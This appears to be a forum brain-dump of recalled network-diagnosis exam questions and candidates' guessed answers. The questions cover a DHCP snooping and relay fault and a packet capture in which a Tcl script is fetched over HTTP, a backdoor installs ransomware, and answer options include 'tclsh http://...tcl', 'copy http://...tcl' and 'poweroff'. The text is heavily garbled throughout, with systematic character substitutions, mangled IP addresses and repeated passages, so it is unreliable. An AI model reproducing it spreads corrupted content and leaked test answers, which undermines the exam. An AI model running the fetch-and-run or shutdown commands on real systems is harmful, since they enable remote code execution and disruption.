DIAG DHCP SNOOPING: The tech server server support are are having difculties to to install and activate the the new server in vlan !!" Tech Tech Support: Hi# we are tr$ing to install a new server in the vlan !!# %ut the server aren&t get an$ ip address add ress via dhcp# we test all the drivers and the server are wor'ing (ne" )e did the tests %elow in the server:
The Networ' *+ Support tea, provide so,e output -or $ou anal$.e# please ta'e a loo':
Topolog$ :
/uestions:
trafc0capture0DHCP0SNOOP0!!!"pcapng
)hat line o- the pac'et capture identi(es the pro%le,1 2 2 2 2 2 2 2 2 2 2 2
3 +3 43 53 222226 H787 93 3 ;3 <3 =3 !3 3
)h$ $ou choose this -ra,e -ro, the pac'et capture1 2 2 2 2 2 2 2
>pdu %loc'ing -ro, S)3 Dhcp in-or,ation option disa%led %ut ip rela$ agent address set3 Dhcp discover -ro, port ;3 ?dp port =3 Dhcp discover to port ; Source is %roadcast3 Dhcp in-or,ation option ena%led %ut ip rela$ agent address unset3 222226 H787
Select the point where the pac'et was captured: S) 26 S)+ 222226 H787 S78@78 26 S) S) 26 DHCP S78@78 S)4 26 S)5 S78@78+ 26 S)4 S)5 26 DHCP S78@78
TC* Scripting: )e -ound an suspect trafc going %etween so,e IP address in our networ'# ta'e a loo' please in the pac'et capture:
trafc0capture0TC*0SC8IPTING0!!!"pcapng
)hat we in-er -ro, the pac'et capture choose 5 options B: 2 2 2 2 2 2 2 2
tcl load into !"""+ ,e,or$ via http3 222226 H787 tcp connection -ro, !"""+ to !""" on port 4!!3 tcl load into !"""+ ,e,or$ via https3 tcp connection -ro, !""" to !"""+ on port 4!!3 222226 H787 !""" gets vt$ line acccess to !"""+3 222226 H787 !"""+ gets vt$ line acccess to !"""3 installs ranso,ware via %ac'door3 222226 H787 installs %ac'door via ranso,ware3
)hat co,,and can disrupt the %o: 2 2 2 2 2 2
:P Shar'-est3 Eill3 Sudo poweroF3 222226 H787 Eill 2= 3
)hat the co,,and could %e the source o- the pro%le,1 2 2 2
Cop$ http:!"""%d+"tcl 3 Tclsh http:!"""%d+"tcl 3 222226 H787 http:!"""%d+"tcl 3
II" DIAG Newest DIAGB " DHCPSnooping Pro%le, 8esource: 2 server# *+S) snooperB# *4S) rela$B# and DHCP server routerB log 2 wireshar' 2 topolog$ is al,ost sa,e with what is sharing in this -oru," /uestion : )hich line1 2 4" Input %ootp in the (lter o- wireshar' and choose the (rt DCHP Discover$ pac'et" II" DIAG Newest DIAGB " DHCPSnooping Pro%le,
8esource: 2 server# *+S) snooperB# *4S) rela$B# and DHCP server routerB log 2 wireshar' 2 topolog$ is al,ost sa,e with what is sharing in this -oru," /uestion : )hich line1 2 4" Input %ootp in the (lter o- wireshar' and choose the (rt DCHP Discover$ pac'et" Question 2-1: Which device has issue? 2 *4S)" Cisco sa$ clearl$ which switch is snooper# which switch is rela$# ine was S) *4S) rela$B" Question 2-2: Which command shows the issue? 2 show ip dhcp rela$ in-or,ation trusted" Question 3: Which link captured the packet? 2 >tw S) and S)4" 2. Attacker/Victim ro!lem" 8esource: wireshar'
/uestion : )hat can $ou see1 "ame in this #orum" /uestion +: How can attac'er %ring down all s$ste,1 I tried to understand the tcl script via TCP -ollow strea, %ut didnJt understand" Kinall$# select LpoweroFL" /uestion 4: How does attac'er attac'1 Not sure %ut choose so,ething li'e tclsh cop$""" Mash:" There was + options t-tp:!"""%d+"tcl and t-tp:!"""+%d+"tcl and I donJt 'now which is correct" I choosed t-tp:!"""+%d+"tcl" $%A& "'()%*+: DHCP: Searched %$ %ootp " )hat -ra,e1 Kra,e 55 +" )hat do $ou see1 Ip rela$ in-or,ation with giaddr ! 4" Pac'et captured -ro,1 Trun' lin' %etween S) and S)4" HACE78: /" As ,entioned here" http"reuest",ethod G7T /+" Sad s,ile$ * %ecause it was sa$ing hope $ou have a %ac'up" /4" Cop$ t-tp to Mash" I don&t re,e,%er this option" ou have to -ollow the tcp strea," It is availa%le in anal$.e 6 -ollow tcp in the capture"
DIAG this section was co,pletel$ new and I a, not sure i- the options I ,ar'ed were correct " The topolog$ is li'e this Server2222 S)422222S)5
Q Q Q Q S)+22222S) Server is in vlan !! and not getting an IP *ogs are provided -or S)4 S) and Server It is as'ed on which device can we see to guess the pro%le," S)4Js ip dhcp snooping log will tell $ou that option <+ has %een ena%led >ut S)Js logs will show that there are not inter-aces where rela$ is trusted So I chose S)+ and show ip dhcp rela$ in-or,ation trusted2sources co,,and A pac'et capture was also given and it was as'ed which -ra,e pointed towards the pro%le," I chose the DHCP discover ,essage which showed option <+ as set" The third pro%le, was to select the inter-ace where the pac'et ,ight have %een captured +" I donJt re,e,%er the eact options here" Onl$ pac'et capture" Shows a lot o- TCP sessions pac'ets %eing passed %etween !""" and !""+ S$n # ac' s$n ac'B aBThe (rst uestion was that what can we in-er -ro, the pac'et ou had to choose 5 options In the pac'et captur $ou can see that !"""+ returns a +!! O' to sa$ that session is good and (le t$pe is tettcl So # I selected that a TC* script was %eing passed to !"""+ via HTTP" There was also a G7T http:!"""+%+"tcl -ro, !""" # so we 'now that !""" is tr$ing to run this script on !"""+ via http" Another option I selected was that so,e hac'er is tr$ing to install ranso,ware via %ac'door
%B)hich co,,and i- issued -ro, the hac'er end can %ring down the co,plete s$ste, 1 options was shar'-est # su env poweroF etc I chose poweroF
